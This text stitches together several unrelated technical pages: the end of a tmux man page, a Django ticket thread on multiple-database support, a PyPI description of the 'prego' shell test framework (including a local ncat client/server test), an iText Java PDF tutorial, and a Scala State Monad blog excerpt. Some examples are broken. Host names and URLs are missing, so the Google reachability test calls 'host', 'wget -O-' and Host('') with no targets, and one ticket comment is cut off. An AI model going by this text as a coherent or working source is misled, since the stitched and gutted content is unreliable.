      When output, any linefeed (LF) characters in the paste buffer are replaced with a separator, by default carriage return (CR). A custom separator may be specified using the -s flag. The -r flag means to do no replacement (equivalent to a separator of LF). If -p is specified, paste bracket control codes are inserted around the buffer if the application has requested bracketed paste mode.

EXIT MESSAGES
When a tmux client detaches, it prints a message. This may be one of:

[detached (from session ...)]
      The client was detached normally.
[detached and SIGHUP]
      The client was detached and its parent sent the SIGHUP signal (for example with detach-client -P).
[lost tty]
      The client's tty(4) or pty(4) was unexpectedly destroyed.
[terminated]
      The client was killed with SIGTERM.
[exited]
      The server exited when it had no sessions.
[server exited]
      The server exited when it received SIGTERM.
[server exited unexpectedly]
      The server crashed or otherwise exited without telling the client the reason.

TERMINFO EXTENSIONS
Smol  Enable the overline attribute. The capability is usually SGR 53 and can be added to terminal-overrides as:

            Smol=\E[53m

Smulx Set a styled underscore. The single parameter is one of: 0 for no underscore, 1 for normal underscore, 2 for double underscore, 3 for curly underscore, 4 for dotted underscore and 5 for dashed underscore. The capability can typically be added to terminal-overrides as:

            Smulx=\E[4::%p1%dm

Setulc
      Set the underscore colour.
The argument is (red * 65536) + (green * 256) + blue where each is between 0 and 255. The capability can typically be added to terminal-overrides as:

            Setulc=\E[58::2::%p1%{65536}%/%d::%p1%{256}%/%{255}%&%d::%p1%{255}%&%d%;m

Tc    Indicate that the terminal supports the `direct colour' RGB escape sequence (for example, \e[38;2;255;255;255m). If supported, this is used for the initialize colour escape sequence (which may be enabled by adding the `initc' and `ccc' capabilities to the tmux terminfo(5) entry).

%pane-mode-changed pane-id
      The pane with ID pane-id has changed mode.
%session-changed session-id name
      The client is now attached to the session with ID session-id, which is named name.
%session-renamed name
      The current session was renamed to name.
%session-window-changed session-id window-id
      The session with ID session-id changed its active window to the window with ID window-id.
%window-pane-changed window-id pane-id
      The active pane in the window with ID window-id changed to the pane with ID pane-id.
%window-renamed window-id name
      The window with ID window-id was renamed to name.

ENVIRONMENT
When tmux is started, it inspects the following environment variables:

EDITOR    If the command specified in this variable contains the string `vi' and VISUAL is unset, use vi-style key bindings. Overridden by the mode-keys and status-keys options.
HOME      The user's login directory. If unset, the passwd(5) database is consulted.
LC_CTYPE  The character encoding locale(1). It is used for two separate purposes. For output to the terminal, UTF-8 is used if the -u option is given or if LC_CTYPE contains "UTF-8" or "UTF8". Otherwise, only ASCII characters are written and non-ASCII characters are replaced with underscores (`_'). For input, tmux always runs with a UTF-8 locale. If en_US.UTF-8 is provided by the operating system it is used and LC_CTYPE is ignored for input. Otherwise, LC_CTYPE tells tmux what the UTF-8 locale is called on the current system.
If the locale specified by LC_CTYPE is not available or is not a UTF-8 locale, tmux exits with an error message.
LC_TIME   The date and time format locale(1). It is used for locale-dependent strftime(3) format specifiers.
PWD       The current working directory to be set in the global environment. This may be useful if it contains symbolic links. If the value of the variable does not match the current working directory, the variable is ignored and the result of getcwd(3) is used instead.
SHELL     The absolute path to the default shell for new windows. See the default-shell option for details.
TMUX_TMPDIR
          The parent directory of the directory containing the server sockets. See the -L option for details.
VISUAL    If the command specified in this variable contains the string `vi', use vi-style key bindings. Overridden by the mode-keys and status-keys options.

ATTRIBUTES
See attributes(7) for descriptions of the following attributes:
      +---------------+------------------+
      |ATTRIBUTE TYPE | ATTRIBUTE VALUE  |
      +---------------+------------------+
      |Availability   | terminal/tmux    |
      +---------------+------------------+
      |Stability      | Uncommitted      |
      +---------------+------------------+

SEE ALSO
pty(4)

AUTHORS
Nicholas Marriott <nicholas.marriott@gmail.com>

NOTES
Source code for open source software components in Oracle Solaris can be found at- downloads.html. This software was built from source available at- cle/solaris-userland. The original community source was downloaded from. Further information about this software can be found on the open source community website at.

BSD                          February 9, 2022                          BSD
https://docs.oracle.com/cd/E88353_01/html/E37839/tmux-1.html
Opened 14 years ago
Closed 10 years ago
Last modified 10 years ago
#1142 closed enhancement (fixed)
Support for multiple database connections
Description
Django currently assumes that all models will be stored in a single database, and that only one database connection will be used for the duration of a request. This assumption does not scale to really large applications, where it is common for multiple database connections to be used in non-obvious ways.
Three examples include:
- Traditional replication, where all writes go to a single master database while reads are distributed across a number of slave databases.
- Sharding, where (for example) user accounts 1-1000 live on db1, 1001-2000 live on db2 etc.
- Different types of data live on different servers / clusters. Frequently accessed user profile data might be stored on a separate database/cluster from log data which is frequently written but very rarely accessed.
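The sharding example above can be sketched as a plain routing function. This is an illustrative sketch only - the connection names and ranges are hypothetical, and nothing here is an actual Django API:

```python
# Hypothetical range-based shard map: user accounts 1-1000 on db1,
# 1001-2000 on db2, and so on, as described above.
SHARD_RANGES = [
    (1, 1000, "db1"),
    (1001, 2000, "db2"),
    (2001, 3000, "db3"),
]

def shard_for_user(user_id):
    """Return the name of the connection holding this user's account."""
    for low, high, connection_name in SHARD_RANGES:
        if low <= user_id <= high:
            return connection_name
    raise ValueError("no shard configured for user %d" % user_id)
```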
At the very least, Django needs to allow more than one database connection to be maintained by the DB wrapper. The default should still be a single connection as this is the common case, but Django should not get in the way should multiple connections be desired.
Rather than having a single connection, how about maintaining a dictionary of connections? A "default" key could correspond to the connection that is used in most cases, but other connections can be configured in the settings file and assigned names. There would need to be a mechanism somewhere for Django model classes to be told which named connection they should use.
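To illustrate the dictionary-of-connections idea, a settings layout and lookup might look like the following sketch. The setting name, keys and fallback behaviour are all hypothetical, not part of Django:

```python
# Hypothetical named-connection settings, as proposed above. A "default"
# key covers the common case; other connections are configured by name.
DATABASE_CONNECTIONS = {
    "default": {"engine": "mysql", "host": "db-main", "name": "content"},
    "invoices": {"engine": "mssql", "host": "db-legacy", "name": "billing"},
}

def connection_settings(name="default"):
    """Look up a named connection, falling back to the default one."""
    return DATABASE_CONNECTIONS.get(name, DATABASE_CONNECTIONS["default"])
```

A model class could then carry a connection-name attribute that is resolved through such a lookup.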
Simple replication may end up being a different issue entirely - it's possible that could be handled just with a custom DB backend that knows to send writes to one server and distribute reads across several others. The above change (where Django allows multiple DB connections) is still essential for more complex configurations.
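The simple replication case can be sketched as a small router that sends writes to the master and rotates reads across replicas. The class and connection names are illustrative, not a real Django backend:

```python
import itertools

class ReplicatedRouter:
    """Toy read/write splitter: writes go to the master connection,
    reads are distributed round-robin across the replica connections."""

    def __init__(self, master, replicas):
        self.master = master
        self._replicas = itertools.cycle(replicas)

    def connection_for(self, is_write):
        # Writes always hit the master; reads take the next replica in turn.
        return self.master if is_write else next(self._replicas)
```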
More about this on the mailing list:
Attachments (1)
Change History (81)
comment:1 Changed 14 years ago by
comment:2 Changed 14 years ago by
My limited experience with really large apps suggests that handling clustering at a lower level won't provide enough flexibility. For huge sites you end up having to take different scaling approaches for different bits of functionality - you might have one web service call (or RSS feed) that is hit more than anything else and needs to be scaled in a different way for example. You end up needing to scale different parts of the application in different ways, often using different databases for different parts of the app.
There are also other use-cases for multiple database connections outside of scaling - talking to two legacy applications at once for example.
comment:3 Changed 14 years ago by
Django may benefit from the ability to define connections at the application level that can override the sitewide setting. This would make it rather trivial to pull data in from multiple platforms.
An interface to SQLrelay might help with the scalability issue.
comment:4 Changed 14 years ago by
Simon,
Per your recommendation here I'm just adding a brief description of the scenario in which we typically encounter this current limitation of Django:
In a mixed-database environment, We're typically faced with having to model data types hosted on different database servers. For example, web content may generally live on our MySQL servers, but some applications will need to incorporate invoice data from a MS SQL database. While it's certainly a general mess to have data spread out over multiple engines like this, I think it's also a fact that many developers (especially in small-medium corporate environments) are faced with, and not having the ability to easily manage data from different source within a Django app is going to be a serious limitation to these people.
The solutions of either being able to define a dictionary of database connections in the sitewide config file or being able to specify database connections on an application level, could both work well. I wonder, though, what exactly would be entailed in defining connections on the application level? Would applications generally be able to add their own settings file in which sitewide preferences could be overwritten, or would there be a specific module, like myapp.db.connections for specifying app-level connections? Maybe the simplest and most backward-compatible approach would be to keep a dictionary of named connections available to installed apps in the sitewide settings file as originally suggested.
Thanks. /Morten
comment:5 Changed 13 years ago by
comment:6 Changed 13 years ago by
I would have to agree that this is a serious limitation.
It is not always possible to restructure existing databases into a single database for use, and it would be of great value to be able to use the Django database model to integrate multiple databases at some level.
comment:7 Changed 13 years ago by
comment:8 Changed 13 years ago by
comment:9 Changed 13 years ago by
(In [3198]) Created branch for MultipleDatabaseSupport. Refs #1142.
What is current status of this? When can we expect to see this in trunk?
thanks,
Forest
comment:18 Changed 13 years ago by
comment:19 Changed 13 years ago by
comment:20 Changed 13 years ago by
Has there been any progress on this feature? I am in a similar situation: my project needs to be able to query different databases for different pieces of data. Another suggestion would be to allow overriding the connection settings at the app level.
comment:21 Changed 13 years ago by
reverted metadata spam.
comment:22 Changed 13 years ago by
comment:23 Changed 13 years ago by
I hope this gets merged into the trunk soon.
comment:24 Changed 13 years ago by
Is multiple database support going to be implemented?
At least in my case, I was looking at Django for an application for my company, but it will need to access at least 2 databases. The main one, plus a database from another product over which we have no control and can't change.
We would actually like it to be 3 databases, with the 3rd one being for reporting data. We prefer to keep reporting data in a separate database for performance purposes and for scalability, but if absolutely necessary, we would put it in the same database as the main data. That still leaves us with at least 2 databases.
We have another app that was done in Java with Hibernate and Hibernate is currently accessing 4 databases from within the same app.
comment:25 Changed 13 years ago by
According to MultipleDatabaseSupport, the branch is feature complete and seems to be only lacking documentation.
If anyone is using or has tested the multi db branch, please note your experiences here.
Marking patch needs improvement since the latest commit to the branch notes that tests are still failing.
comment:26 Changed 13 years ago by
Question: Does the patch for this also provide a work-around for keeping the native Django apps tables out of your database?
comment:27 Changed 13 years ago by
Changed 13 years ago by
Fixes multiple-db-support branch django/db/models/manager.py for Python 2.3
comment:28 Changed 13 years ago by
It's been a long time since anything has happened to this branch... will it ever get included in the main trunk?
I wish to use this, but I want to stay with the current Django code. Is it possible to check out the trunk and merge the changes from this branch?
comment:29 Changed 13 years ago by
oops, reverting the hash patch flag i removed
comment:30 Changed 13 years ago by
Please post questions like comment 28 to the users list, not this ticket. Ticket comments are for resolving the issue at hand, not seeking general information.
comment:31 Changed 12 years ago by
Hi there, I have been following this conversation. I am working with some friends on a research project that requires one, maybe several, postgres DBs. It is a bit off-label, but we're hoping to make use of some of the Django features.
Multiple DBs is something we might need long-term. Can someone tell me how to install this patch? I am running the latest Django code with Python 2.4.
So far, I see some patch online with about four lines of code... My Python skills are somewhere around early intermediate, so I am not sure:
- whether just placing that code in my latest subversion checkout (where the surrounding code looks a bit different than what is there) constitutes an installation of this patch,
and
- how can I use it?
Appreciate your patience and assistance.
Robert
comment:32 Changed 12 years ago by
comment:33 Changed 12 years ago by
comment:35 Changed 12 years ago by
Reverted spam.
comment:36 Changed 12 years ago by
comment:37 Changed 12 years ago by
comment:38 Changed 12 years ago by
comment:39 Changed 12 years ago by
comment:40 Changed 12 years ago by
comment:41 Changed 12 years ago by
comment:42 Changed 12 years ago by
I reviewed an API design with Jacob and Adrian (and others) and will now work on a prototype. Much of the credit for the API goes to Ben Ford (and his code should give me a big headstart).
comment:43 follow-up: 44 Changed 12 years ago by
I'm glad to see someone taking this ticket, it's something I've wanted for a long time. Any chance you can write up your planned API?
comment:44 Changed 12
comment:52 Changed 11 years ago by
Ben Ford set up a mercurial repository for new work on multiple databases at. A Trac setup is available at.
comment:53 Changed 11 years ago by
See this django-developers thread for more discussion (including my API proposal):
comment:54 Changed 11 years ago by
Not in scope for 1.0.
comment:55 Changed 11 years ago by
comment:56 Changed 11 years ago by
comment:57 Changed 11 years ago by
What is the current status on this issue? There doesn't appear to have been any visible movement in several months now, and this is something which would be very useful in a project I'm working on. I have a slightly different use case than the previously mentioned ones, however... and I'm sure it's not an entirely common one, but perhaps something to take into consideration.
The company I work for is sitting on a fairly large data warehouse for a number of clients. Each client has their own database, with a common schema, on one of two MS SQL 2k servers. In the near future, we will hopefully be moving some of these clients onto a PostgreSQL server (and in the distant future, it would be nice to move towards Greenplum; although that should be transparent with psycopg2, afaik). In addition, there is a separate database already running on the PostgreSQL server, which stores configuration parameters and which I am using for the Django system tables.
On every page load, I need Django to connect to database 'A' on the PostgreSQL server for any Django specific operations, then connect to an arbitrary database on either of the MS SQL servers, depending on which of our clients' data is currently being viewed. From what I've seen so far in the discussion in this ticket and on MultipleDatabaseSupport, this doesn't sound like it would likely be a supported scenario, as the connection to be used is determined dynamically, rather than a static connection chosen per model. In my case, all models apply across all database connections.
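The dynamic selection described here, picking a connection at request time rather than statically per model, can be sketched with a thread-local alias. This is only an illustration of the idea, not the commenter's actual connection manager; `use_database` and `current_database` are invented names.

```python
import threading

_state = threading.local()

# Illustrative aliases: one config database plus per-client warehouses.
DATABASES = {
    'config':   'postgresql: database A',
    'client_1': 'mssql: client one warehouse',
    'client_2': 'mssql: client two warehouse',
}

def use_database(alias):
    """Select the database for the current thread (e.g. per web request)."""
    _state.alias = alias

def current_database():
    """Return the connection currently selected, defaulting to 'config'."""
    return DATABASES[getattr(_state, 'alias', 'config')]
```

Because the alias lives in thread-local storage, each request-handling thread can point the same models at a different backend without touching the others.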
Now, I have made this work thus far with my own connection manager (), but using it is somewhat kludgy and I'm sure it's far from a full implementation. I also had to apply a hack () to django-pyodbc and apply a pending patch (#6710) to Django in order to get it to work. Here is an example of it in use:
comment:58 Changed 11 years ago by
There has, in fact, been lots of activity. Perhaps you might wish to peruse the archives of django-developers, which is where design work takes place. This ticket is really just a placeholder that will be closed when we commit some kind of final solution (and possibly for patches as we get closer if the work is self-contained enough not to require a branch).
comment:59 Changed 11 years ago by
comment:60 Changed 11 years ago by
comment:61 Changed 11 years ago by
Milestone post-1.0 deleted
comment:62 Changed 11 years ago by
comment:63 Changed 11 years ago by
My approach is:

# Wrapper classes
from re import compile

class Db:
    def __init__(self, cstr):
        self.link = None
        __re_dbstr = compile(r'^(?P<engine>[^:]+)://((?P<user>[^\(:]+)(\((?P<role>.+)\))?(:(?P<password>[^@]+))?(@(?P<host>[^\/:]+)(:(?P<port>\d+))?)?)?/(?P<name>.+)')
        try:
            self.__db = __re_dbstr.search(cstr).groupdict()
            # Fix for sqlite
            if self.__db['engine'].startswith('sqlite'):
                self.__db['name'] = "/%s" % self.__db['name']
        except:
            self.__db = {}
            raise Exception("#1")
        self.connect()

    def connect(self):
        self.link = 'Connection link'  # ....

    def keys(self):
        return self.__db.keys()

    def items(self):
        return self.__db.items()

    def __getitem__(self, key):
        return self.__db.get(key, None)

    def __getattr__(self, key):
        return self.__db.get(key, None)


class DbPool:
    def __init__(self):
        self.__dbs = {}
        self.__default = None

    def __getitem__(self, db_alias):
        if db_alias not in self.__dbs:
            raise Exception('#2')
        return self.__dbs[db_alias]

    def __getattr__(self, key):
        if not self.__default:
            raise Exception('#3')
        return self.__dbs[self.__default].__getattr__(key)

    def add(self, db_alias, db_str):
        self.__dbs[db_alias] = Db(db_str)
        if self.__default:
            return
        self.set_default(db_alias)

    def get_default(self):
        return self.__default

    def set_default(self, dbAlias):
        if dbAlias in self.__dbs:
            self.__default = dbAlias
        else:
            raise Exception("#4")


# Settings
DATABASES = {
    'alpha': 'sqlite3:///:memory:',
    'beta': 'sqlite3:///tmp/django.sqlite3',
    'gamma': 'mysql://user1/django',
    'delta': 'mysql://user1:password1/django',
    'default': 'mysql://user1:password1@host1/django',
    'reserv1': 'mysql://user1:password1@host1:1234/django',
    'reserv2': 'postgresql://user1(role1):password1@host1/django',
    'etc': 'postgresql://user1(role1):password1@host1:1234/django',
}
DATABASE_DEFAULT = 'default'
DATABASE_OPTIONS = {}
DATABASE_OPTIONS['etc'] = {
    'ssl': '...'
}

# Setting handlers
pool = DbPool()
for dbase in DATABASES.items():
    pool.add(*dbase)
pool.set_default(DATABASE_DEFAULT)

# Default database
print pool.engine, pool.host, pool.name
# Some other db
print pool['etc'].engine, pool['etc'].host, pool['etc'].name

# Models
class SomeModel():
    # If not defined
    # meta_connections = [DATABASE_DEFAULT]
    meta_connections = ['alpha', 'beta']

# API
# instead of
#   from django.db import connection
#   connection.cursor()
# use
#   from django.db import pool
#   pool.link.cursor()
#   pool['etc'].link.cursor()
comment:64 Changed 10 years ago by
This ticket is accepted as a part of the 2009 GSOC.
comment:65 Changed 10 years ago by
I made a Multiple database manager for django-blocks see:
just need to do something like this to your model:
from django.db import models
from blocks.apps.core.managers import MultiDBManager

class SomeModel(models.Model):
    code = models.IntegerField(primary_key=True)
    name = models.CharField(max_length=250)

    objects = MultiDBManager()

    class Meta:
        db_name = 'oracle'
comment:66 follow-up: 72 Changed 10 years ago by
comment:67 Changed 10 years ago by
comment:68 Changed 10 years ago by
comment:69 Changed 10 years ago by
comment:70 Changed 10 years ago by
comment:71 Changed 10 years ago by
comment:72 follow-up: 73 Changed 10 years ago by
Replying to alexkoshelev:
I've implemented this on a development version of Django 1.1. It appears as though it creates the app's table in the database established in the project settings, instead of adding the model's tables to the declared database.
from django.db import models
from django.blocks.apps.core.managers import MultiDBManager

class FireMap(models.Model):
    address = models.CharField(max_length=100)
    city = models.CharField(max_length=50)
    zip = models.IntegerField()
    latitude = models.DecimalField(max_digits=17, decimal_places=14)
    longitude = models.DecimalField(max_digits=17, decimal_places=14)
    neighborhood = models.CharField(max_length=30)
    assesorID = models.IntegerField()
    assessorURL = models.URLField()
    homeValue = models.CommaSeparatedIntegerField(max_length=8)
    homeOwner = models.CharField(max_length=30)
    mainIMGURL = models.URLField()
    photos = models.CommaSeparatedIntegerField(max_length=40)
    articleID1 = models.IntegerField()
    articleID2 = models.IntegerField()
    articleID3 = models.IntegerField()
    extrainfo = models.TextField()

    objects = MultiDBManager()

    def __str__(self):
        return self.name

    class Meta:
        db_name = 'firemap'
the setting for the Db in my project settings file is set to:
DATABASE_ENGINE = 'postgresql_psycopg2'  # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
DATABASE_NAME = 'newsok'                 # Or path to database file if using sqlite3.
When the tables are created, I see a firemap_firemap table in the newsok DB (firemap is the name of the app as well), but there is nothing in the actual firemap DB.
I apologize if this isn't the place to report this issue. I am new around here and to django in general.
comment:73 Changed 10 years ago by
Replying to alexkoshelev:
I've implemented this on a development version of django 1.1.
...
I apologize if this isn't the place to report this issue. I am new around here and to django in general.
Nick - as noted in comment 64, Multiple database connections was the subject of a 2009 Google Summer of Code project. Alex Gaynor has been developing the code to implement this. It's not a minor change - it requires lots of changes throughout Django. Check out Alex's GitHub repository if you want to see the progress he has made. It isn't quite ready for trunk yet, but it's getting close, and it's sufficiently functional that you can try it out.
comment:74 Changed 10 years ago by
If you want to see the current state of the work, please use my branch at soc2009/multidb in the Django repository; right now my GitHub repo is undergoing severe code alterations that make it highly unstable.
comment:75 Changed 10 years ago by
comment:76 Changed 10 years ago by
comment:77 Changed 10 years ago by
comment:78 Changed 10 years ago by
comment:79 Changed 10 years ago by
comment:80 Changed 10 years ago by
I know posts should be focused on ticket problems or solutions, but I can't help myself.
thank you so much! what a great Christmas gift!
An alternative to this would be to use something like C-JDBC/Sequoia () and manage the clustering at a lower level than Django itself.
the link is for a JDBC wrapper, but they also have a C++ library which might be useful. all that is needed is a python module ;-)
regards
Ian
https://code.djangoproject.com/ticket/1142
System test framework over POSIX shells
Project description
Prego is a system/integration test framework running as Python unittest testcases.
Prego is a library consisting of a set of classes and hamcrest matchers useful for specifying shell command interactions through files, environment variables, and network ports. It provides support to run shell commands in the background, send signals to processes, set assertions on command stdout or stderr, etc.
Concepts
First: a Task() is a set of assertions.
Three assertion checkers are available:
- task.assert_that, for single shot checking.
- task.wait_that, for polling recurrent checking.
- task.command, to run arbitrary shell command.
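The difference between the single-shot and polling checkers can be sketched as follows. This is a simplification for illustration, not prego's actual implementation:

```python
import time

def assert_that(check):
    """Single shot: evaluate the condition exactly once."""
    if not check():
        raise AssertionError('condition failed')

def wait_that(check, timeout=5.0, interval=0.1):
    """Polling: re-evaluate the condition until it holds or time runs out."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if check():
            return
        time.sleep(interval)
    raise AssertionError('condition not met within %.1fs' % timeout)
```

The polling form is what lets a client task wait for a detached server task to come up before asserting anything about it.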
Subjects (and their associated assertions):
- Task(desc='', detach=False)
- command(cmd_line, stdout, stderr, expected, timeout, signal, cwd, env)
- running()
- terminated()
- File(path)
- exists()
- File().content
- any hamcrest string matchers (ie: contains_string)
- Variable
- exists()
- any hamcrest string matchers (ie: contains_string)
- Command
- running()
- exits_with(value)
- killed_by(signal)
- Host(hostname)
- listen_port(number, proto='tcp')
- reachable()
Execution model
command
context
The context is an object whose attributes may be automatically interpolated in command and filename paths.
Some of them are set as default values for command() parameters too. If context.cwd is set, all commands in the same test method will use that value as CWD (Current Working Directory) unless you define a different value as a command() keyword argument.
Context attributes that default command() parameters are cwd, timeout, signal and expected.
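The way context attributes default the command() parameters can be sketched like this. It is a simplification for illustration, not prego's actual code:

```python
class Context(object):
    """Attribute bag; unset attributes simply don't exist."""
    pass

def command_settings(ctx, **overrides):
    """Merge context defaults (cwd, timeout, signal, expected) with
    explicit command() keyword arguments; explicit arguments win."""
    settings = {}
    for name in ('cwd', 'timeout', 'signal', 'expected'):
        if hasattr(ctx, name):
            settings[name] = getattr(ctx, name)
    settings.update(overrides)
    return settings
```

So setting `ctx.cwd` once makes every command in the test method run there, while any single command can still pass its own `cwd=` and override the context.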
Interpolation
Available interpolation variables are:
- $basedir: the directory where prego is executed (relative).
- $fullbasedir: absolute path of $basedir.
- $testdir: the directory where the running test file is.
- $fulltestdir: absolute path of $testdir.
- $testfilename: the file name of the running test.
- $tmpbase: a safe directory (per user) to put temporary files.
- $tmp: a safe directory (per user and prego instance) to put temporary files.
- $pid: the prego instance PID.
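The `$name` interpolation above behaves like Python's `string.Template` substitution; a sketch, with made-up context values for illustration:

```python
from string import Template

def interpolate(text, context):
    """Expand $name placeholders from a context dictionary, leaving
    unknown placeholders untouched."""
    return Template(text).safe_substitute(context)

# Illustrative values; the real ones are computed per prego run.
context = {'basedir': '.', 'tmp': '/tmp/prego-user/1234', 'pid': 1234}
```

This is why a command line like `ncat -l -p $port` picks up `ctx.port` automatically.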
Examples
Testing ncat
import hamcrest
from prego import Task, TestCase, context as ctx, running
from prego.net import localhost, listen_port
from prego.debian import Package, installed

class Net(TestCase):
    def test_netcat(self):
        ctx.port = 2000

        server = Task(desc='ncat server', detach=True)
        server.assert_that(Package('nmap'), installed())
        server.assert_that(localhost, hamcrest.is_not(listen_port(ctx.port)))
        cmd = server.command('ncat -l -p $port')
        server.assert_that(cmd.stdout.content, hamcrest.contains_string('bye'))

        client = Task(desc='ncat client')
        client.wait_that(server, running())
        client.wait_that(localhost, listen_port(ctx.port))
        client.command('ncat -c "echo bye" localhost $port')
This test may be executed using nosetest:
$ nosetests examples/netcat.py
.
----------------------------------------------------------------------
Ran 1 test in 1.414s

OK
But prego provides a wrapper (the prego command) that has some interesting options:
$ prego -h
usage: prego [-h] [-c FILE] [-k] [-d] [-o] [-e] [-v] [-p] ...

positional arguments:
  nose-args

optional arguments:
  -h, --help            show this help message and exit
  -c FILE, --config FILE
                        explicit config file
  -k, --keep-going      continue even with failed assertion or tests
  -d, --dirty           do not remove generated files
  -o, --stdout          print tests stdout
  -e, --stderr          print tests stderr
  -v, --verbose         increase log verbosity
Same ncat test invoking prego:
[II] ------ Net.test_netcat BEGIN
[II] [ ok ] B.0 wait that A is running
[II] [ ok ] A.0 assert that nmap package is installed
[II] [ ok ] A.1 assert that localhost not port 2000/tcp to be open
[II] [fail] B.1 wait that localhost port 2000/tcp to be open
[II] [ ok ] B.1 wait that localhost port 2000/tcp to be open
[II] A.2.out| bye
[II] [ ok ] B.2 Command 'ncat -c "echo bye" localhost 2000' code (0:0) time 5:1.28
[II] [ ok ] B.3 assert that command B.2 returncode to be 0
[II] [ ok ] B.4 assert that command B.2 execution time to be a value less than <5>s
[II] [ OK ] B Task end - elapsed: 1.17s
[II] [ ok ] A.2 Command 'ncat -l -p 2000' code (0:0) time 5:1.33
[II] [ ok ] A.3 assert that command A.2 returncode to be 0
[II] [ ok ] A.4 assert that command A.2 execution time to be a value less than <5>s
[II] [ ok ] A.5 assert that File '/tmp/prego-david/26245/A.2.out' content a string containing 'bye'
[II] [ OK ] A Task end - elapsed: 1.32s
[II] [ OK ] Net.test_netcat END
----------------------------------------------------------------------
Ran 1 test in 1.396s

OK
Testing google.com reachability
import hamcrest
from prego import TestCase, Task
from prego.net import Host, reachable

class GoogleTest(TestCase):
    def test_is_reachable(self):
        link = Task(desc="Is interface link up?")
        link.command('ip link | grep wlan0 | grep "state UP"')

        router = Task(desc="Is the local router reachable?")
        router.command("ping -c2 $(ip route | grep ^default | cut -d' ' -f 3)")

        for line in file('/etc/resolv.conf'):
            if line.startswith('nameserver'):
                server = line.split()[1]
                test = Task(desc="Is DNS server {0} reachable?".format(server))
                test.command('ping -c 2 {0}'.format(server))

        resolve = Task(desc="may google name be resolved?")
        resolve.command('host')

        ping = Task(desc="Is google reachable?")
        ping.command('ping -c 1')
        ping.assert_that(Host(''), reachable())
        ping.assert_that(Host(''), hamcrest.is_not(reachable()))

        web = Task(desc="get index.html")
        cmd = web.command('wget -O-')
        web.assert_that(cmd.stdout.content, hamcrest.contains_string('value="I\'m Feeling Lucky"'))
Project details
Release history Release notifications
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/prego3/0.20181031/
In this article, we learn how to create PDF files using iTextPDF's Java library. This tutorial includes a video guide that explains how to add the iTextPDF library to your Eclipse project, and later you learn how to use it in order to create a PDF file. If you prefer text instructions, then keep reading. If you prefer to watch video, then take a look at the video below.
Let’s start the tutorial with Installation of iText.
Installation
- Go to iText PDF library files.
- Extract the content of zip file.
- Create a folder and copy the contents of zip folder.
- Open Eclipse IDE.
- Create a new Java project.
- Add the itext jar files in class path.
- Finish the project creation wizard.
- That’s it.
Once you have created the Eclipse Java project and added the itext jar files, the next step is to focus on the code. Here we have to create a document, and after creating it we push the content inside the document. This helps us format the content properly before exporting the document to PDF. So let's see how this can be done with the code. Check out the code below.
import java.io.FileOutputStream;
import java.io.FileNotFoundException;
import com.itextpdf.text.Document;
import com.itextpdf.text.DocumentException;
import com.itextpdf.text.Paragraph;
import com.itextpdf.text.pdf.PdfWriter;
public class Demo
{
public static void main(String[] args)
{
Document document = new Document();
try
{
PdfWriter writer = PdfWriter.getInstance(document, new FileOutputStream("demo.pdf"));
document.open();
document.add(new Paragraph("This is Demo PDF"));
document.close();
writer.close();
} catch (DocumentException e)
{
e.printStackTrace();
} catch (FileNotFoundException e)
{
e.printStackTrace();
}
}
}
Code: In the first statement, we create a PdfWriter instance along with the PDF document. In the second statement, we open the created document. In the next statement, we add the content to the PDF document. Finally, we close the document and the writer. This code is placed inside a try/catch block to handle document and file exceptions.
You can copy the code given above and paste it inside your Eclipse project class. Just watch out for the classname in this code, and change it to your project's classname. Make that change and any other change in the output that you want. The next step is to run the code.
When you run the code, Eclipse exports the PDF using iText, and the file is stored in the same folder as the project files. This was just an example, and there are many other things you can do with the document. You can format it as a table, or use it to export database tables to a PDF document. There are also styles you can apply to the document; for these, I suggest you check out the documentation of the iText PDF library. In the future I may cover more examples for the iText library, including styling and form handling along with database export options.
If you like this short tutorial, then do let me know. Also check out the video above to see the code in action. Don't forget to share the article with your friends on social media. If you have any questions or suggestions regarding the video or the code, then do let me know. 🙂
http://onecore.net/create-pdf-files-in-java-using-itext-pdf-library.htm
While looking for a more real-world example in order to complete a previous blog entry, I found myself struggling with the State Monad in order to solve what I supposed to be a typical State Monad problem.
My ramblings to solve this specific problem did not succeed, while in the meantime I successfully reproduced the canonical example of stack manipulation extracted from Learn You a Haskell (LYAH). Although I am not satisfied with the result, I would like to expose this "kata" and will ask for your feedback in order to reach the expected goal.
I especially thank Nilanjan Raychaudhuri - the author of Scala in Action - for his precious help. Reading chapter 10 from his book confirmed I was working in the right direction.
Reproducing the LYAH example remains a fruitful exercise in that sense that it constrains you to use Scala idioms (typing, self type annotation etc.) and forces you to think about some of the inner mechanics of the for comprehensions.
In order to expose the interest of reproducing state management in functional programming languages, Miran Lipovaca presents a three-coins problem simulating the extraction of results from tossing a coin, and a stack manipulation problem. From the point of view of imperative languages, the random generator internals or the stack internals would be easily modifiable mutable objects, allowing us to generate new numbers or alter the stack state.
In a pure functional language, we manipulate immutable data. We have to create a new value object each time the equivalent of a state change occurs. But what if we could separate the flow of data from the side-effecting manipulation of the change of state?
And that, is specifically our purpose, embedding a change of state in a dedicated instance. The secret lays into the abstract representation of this change of state as a function:
def apply(state: S): (T, S)
where S references the type of the state to be changed, and T is the type of the result of the stateful computations. The whole class hosts the apply function (so is applicable by itself in Scala), and impersonates the context that contains the state management. You apply the context in order to get your result value:
contextInstance(previousState) = (result, newState)
For the same price, you get the altered state. In the case of a stack, the state is the stack content. The provided manipulation contexts will be class instances implementing context templates for stack manipulation like pop and push. We will represent a stack state as a List of items of type A:
List[A]
Consequently, if we choose to name our state context StateMonad, the pop and push operations can be gathered in a Stack scope definition like the following:

object Stack {
  def push[A](item: A) = new StateMonad[Unit, List[A]] {
    def apply(state: List[A]) = ((), item :: state)
  }

  def pop[A] = new StateMonad[Option[A], List[A]] {
    def apply(state: List[A]) = state match {
      case x :: xs => (Some(x), xs)
      case _ => (None, state)
    }
  }
}
taking a leap of faith regarding an existing definition of the StateMonad trait. In the meantime we have acknowledged that our state Monad trait definition will be parameterized as:
trait StateMonad[+T, S]
While pushing data on top of a stack, I expect no result, so I return a () (aka void) instance:
scala> import Stack._
import Stack._

scala> push(5)(List())
res0: (Unit, List[Int]) = ((),List(5))
while the result of a pop context execution may contain an optional item of type A, depending on the size of the previous stack state (no elements at all, or at least one element):
scala> import Stack._
import Stack._

scala> pop(List(1))
res1: (Option[Int], List[Int]) = (Some(1),List())

scala> pop(List())
res2: (Option[Nothing], List[Nothing]) = (None,List())
